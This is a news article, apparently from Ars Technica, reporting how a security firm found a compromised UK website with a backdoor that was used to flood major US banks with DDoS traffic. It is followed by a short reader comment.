Secret footsoldier targeting banks reveals meaner, leaner face of DDoS

[xelosia]

Screenshots showing the denial-of-service PHP script before and after it has been decoded.

Over the past two weeks, a new wave of Web attacks has battered major US banks, causing disruptions for many of their online services. Now, an Israel-based security firm has uncovered one of the secret footsoldiers behind the mass assault: a compromised website that was rigged to unleash a torrent of junk traffic on three of the world's biggest financial institutions.
The discovery by Web application security firm Incapsula helps explain the strategy behind the four-month-old campaign, which has been carried out under the flag of a group calling itself Izz ad-Din al-Qassam—rather than compromise and recruit thousands or tens of thousands of end-user PCs to carry out the distributed denial-of-service attacks, why not target a handful of Web servers that have orders of magnitude more bandwidth and processing power?
Over the weekend, Incapsula researchers noticed a general-interest website located in the UK that was exhibiting suspicious behavior. They quickly discovered a backdoor that had been planted on it that was programmed to receive instructions from remote attackers. An analysis showed the website, which had just recently contracted with Incapsula, was being directed to send a flood of HTTP and UDP packets to major banks including PNC Financial Services, HSBC, and Fifth Third Bank.
"Since the commands were blocked by our service the attack was mitigated even before it started, so we can't be absolutely sure about the scope of damage this attack would cause," Incapsula Security Analyst Ronen Atias wrote in a blog post published Tuesday. "Still, it is safe to assume that it would be enough to seriously harm an average medium-sized website."
The blog post came the same day that purported Izz ad-Din al-Qassam members posted a new message that warned the attacks would continue until the removal of a YouTube video the group says is offensive to Muslims. In recent days, banks including BB&T, Fifth Third Bank, Ally Financial Corp., and PNC have all reportedly confirmed site on online banking access issues. The unidentified site discovered by Incapsula was most likely compromised as a result of weak security. The administration password was simply "admin."
The backdoor was programmed to accept attack code remotely sent by the attackers. The PHP scripts contained detailed instructions, which among other things included precisely timed directions intended to order attacks to be stopped and then renewed just as the target website was starting to recover. The scripts were programmed to open a new instance of themselves each time they were executed, causing the torrents to grow exponentially larger over time. Because the compromised Web server was located in a shared hosting environment, there was enough bandwidth and processing power available to accommodate the ever-growing demands.
Incapsula's blog post may help to explain observations aired three months ago that crippling attacks on the websites of Bank of America, Wells Fargo and at least three other large banks were executed by hundreds of compromised servers. The extra horse power of the machines created peak floods exceeding 60 gigabits per second, a volume big enough to knock even large sites offline unless they take special action to block the attacks.
Ronen told Ars the attack code he observed was separate from a relatively new attack tool known as "itsoknoproblembro," which was deployed on many of the compromised servers discovered three months ago. Still, the ability of the new code to work in shifts and to gradually multiply itself appeared to make the recently discovered attack highly effective. Adding to the success, attackers need little more than a laptop and a decent command of PHP and hacking techniques to ply their trade. The considerable amount of electricity, bandwidth, and equipment required were all supplied by unwitting accomplices.
Indeed, the command and control server used to funnel commands to the compromised Web server was itself a Turkish website, which Incapsula's Atias also believes was compromised.
"This is just another demonstration of how security in the internet is always determined by the weakest link," he wrote. "Simply neglecting to manage [an] administrative password in a small site in the UK can be very quickly exploited by botnet shepherds operating obscurely out of Turkey to hurl large amounts of traffic at American banks. This is a good example of how we are all just a part of a shared ecosystem where website security should be a shared goal and a shared responsibility."

Secret footsoldier targeting banks reveals meaner, leaner face of DDoS | Ars Technica

[Adham]

they taking 1cent from every account again :P